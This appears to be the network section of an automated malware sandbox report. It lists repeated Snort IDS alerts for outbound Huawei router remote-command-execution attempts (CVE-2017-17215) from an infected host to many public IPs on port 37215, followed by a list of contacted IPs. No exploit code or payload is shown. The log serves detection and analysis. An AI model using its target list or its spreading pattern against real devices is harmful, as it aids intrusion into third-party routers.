                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:56628 -> 41.131.32.127:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:56628 -> 41.131.32.127:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:49762 -> 41.113.228.87:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:49762 -> 41.113.228.87:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:45958 -> 31.109.136.47:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:45958 -> 31.109.136.47:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:47580 -> 197.67.83.201:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:47580 -> 197.67.83.201:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:57958 -> 157.65.135.46:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:57958 -> 157.65.135.46:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:43562 -> 41.176.239.47:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:43562 -> 41.176.239.47:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:58292 -> 41.242.92.176:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:58292 -> 41.242.92.176:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:41620 -> 197.73.148.207:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:41620 -> 197.73.148.207:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:52126 -> 41.210.190.226:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:52126 -> 41.210.190.226:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:34892 -> 157.15.207.26:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:34892 -> 157.15.207.26:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:56242 -> 197.152.109.133:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:56242 -> 197.152.109.133:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:38340 -> 41.220.185.255:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:38340 -> 41.220.185.255:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:39912 -> 157.242.87.137:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:39912 -> 157.242.87.137:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:44062 -> 197.2.243.19:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:44062 -> 197.2.243.19:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:55308 -> 197.114.174.185:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:55308 -> 197.114.174.185:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:52268 -> 41.169.59.140:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:52268 -> 41.169.59.140:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:35060 -> 157.110.164.5:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:35060 -> 157.110.164.5:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:47408 -> 197.93.11.245:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:47408 -> 197.93.11.245:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:42172 -> 197.74.125.70:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:42172 -> 197.74.125.70:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:51900 -> 197.224.135.122:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:51900 -> 197.224.135.122:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:56750 -> 157.175.234.176:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:56750 -> 157.175.234.176:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:50304 -> 41.123.144.59:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:50304 -> 41.123.144.59:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:58504 -> 197.185.200.226:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:58504 -> 197.185.200.226:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:41568 -> 172.203.211.21:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:41568 -> 172.203.211.21:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:33320 -> 160.150.120.6:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:33320 -> 160.150.120.6:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:58988 -> 157.82.197.17:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:58988 -> 157.82.197.17:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:45332 -> 197.185.234.207:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:45332 -> 197.185.234.207:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:53688 -> 197.7.125.219:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:53688 -> 197.7.125.219:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:53944 -> 41.108.135.139:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:53944 -> 41.108.135.139:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:47422 -> 41.109.138.73:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:47422 -> 41.109.138.73:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:39456 -> 41.217.161.250:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:39456 -> 41.217.161.250:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:50072 -> 157.43.17.120:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:50072 -> 157.43.17.120:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:36580 -> 220.146.227.68:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:36580 -> 220.146.227.68:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:37934 -> 41.56.70.210:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:37934 -> 41.56.70.210:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:44436 -> 182.100.45.77:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:44436 -> 182.100.45.77:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:49266 -> 115.159.110.59:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:49266 -> 115.159.110.59:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:44512 -> 146.216.38.126:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:44512 -> 146.216.38.126:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:36872 -> 157.2.101.114:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:36872 -> 157.2.101.114:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:44474 -> 119.19.85.1:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:44474 -> 119.19.85.1:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:59300 -> 197.185.227.211:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:59300 -> 197.185.227.211:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:55410 -> 201.87.48.17:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:55410 -> 201.87.48.17:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:44476 -> 157.91.216.201:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:44476 -> 157.91.216.201:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:57626 -> 197.111.46.98:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:57626 -> 197.111.46.98:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:51118 -> 157.54.103.245:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:51118 -> 157.54.103.245:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:45950 -> 157.190.169.188:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:45950 -> 157.190.169.188:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:52216 -> 41.222.216.199:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:52216 -> 41.222.216.199:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:41586 -> 157.148.145.67:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:41586 -> 157.148.145.67:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:41584 -> 197.194.186.100:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:41584 -> 197.194.186.100:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:52148 -> 213.125.132.14:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:52148 -> 213.125.132.14:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:44000 -> 41.61.0.75:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:44000 -> 41.61.0.75:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:33818 -> 97.252.215.207:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:33818 -> 97.252.215.207:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:51578 -> 197.18.224.113:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:51578 -> 197.18.224.113:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:40344 -> 222.144.196.58:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:40344 -> 222.144.196.58:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:53292 -> 197.205.65.184:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:53292 -> 197.205.65.184:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:47908 -> 207.143.202.171:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:47908 -> 207.143.202.171:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:46240 -> 72.1.89.96:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:46240 -> 72.1.89.96:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:46370 -> 197.233.197.244:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:46370 -> 197.233.197.244:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:40910 -> 197.97.160.188:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:40910 -> 197.97.160.188:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:51408 -> 41.168.230.170:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:51408 -> 41.168.230.170:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:40678 -> 96.164.189.247:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:40678 -> 96.164.189.247:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:57420 -> 95.6.102.183:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:57420 -> 95.6.102.183:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:38804 -> 157.84.223.216:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:38804 -> 157.84.223.216:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:49848 -> 223.202.108.28:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:49848 -> 223.202.108.28:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:55740 -> 208.161.189.2:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:55740 -> 208.161.189.2:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:59974 -> 157.214.221.251:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:59974 -> 157.214.221.251:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:32918 -> 196.152.75.99:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:32918 -> 196.152.75.99:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:48374 -> 157.37.47.144:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:48374 -> 157.37.47.144:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:38332 -> 118.5.88.137:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:38332 -> 118.5.88.137:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:51828 -> 41.23.56.7:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:51828 -> 41.23.56.7:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:35782 -> 155.214.61.55:37215
                  Source: global trafficTCP traffic: 157.3.167.49 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.6.200.200 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.4.165.175 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.160.75.223 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 76.67.19.72 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.132.48.155 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.63.122.86 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 83.234.12.5 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.140.199.27 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.243.21.240 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.229.194.154 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 42.50.105.163 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.17.249.189 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 62.95.212.180 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.211.102.37 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.113.228.87 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.183.231.200 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.57.3.241 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 143.35.106.26 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.133.62.163 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.242.92.176 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.53.119.215 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.104.104.36 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.67.83.201 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.37.215.28 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.152.25.4 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.144.119.48 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.50.1.139 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.112.122.70 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.87.72.223 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.236.73.170 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.75.134.248 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.112.225.204 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.94.130.196 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.174.221.211 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.18.54.167 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.80.163.19 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.102.215.162 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.32.254.76 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.10.92.249 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.112.0.159 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.127.40.49 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.219.94.15 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.68.18.177 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.150.250.235 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 27.172.132.240 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 113.60.169.38 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.19.227.185 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 81.136.9.220 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.239.15.185 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.85.122.207 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.97.85.89 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.186.14.146 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 73.29.179.208 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.162.87.60 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.95.147.31 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.41.46.220 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 95.64.141.187 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 18.174.225.100 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.91.11.141 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.212.203.241 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.90.38.247 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.161.2.82 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 146.79.129.185 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.54.56.183 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.248.55.5 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.191.112.197 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.65.135.46 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.42.1.185 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 86.7.97.222 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.196.164.15 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 158.120.90.102 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.205.200.233 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.242.51.203 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.253.79.86 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.217.95.61 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 197.47.132.248 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 157.80.138.133 ports 1,2,3,5,7,37215
                  Source: global trafficTCP traffic: 41.158.215.31 ports 1,2,3,5,7,37215
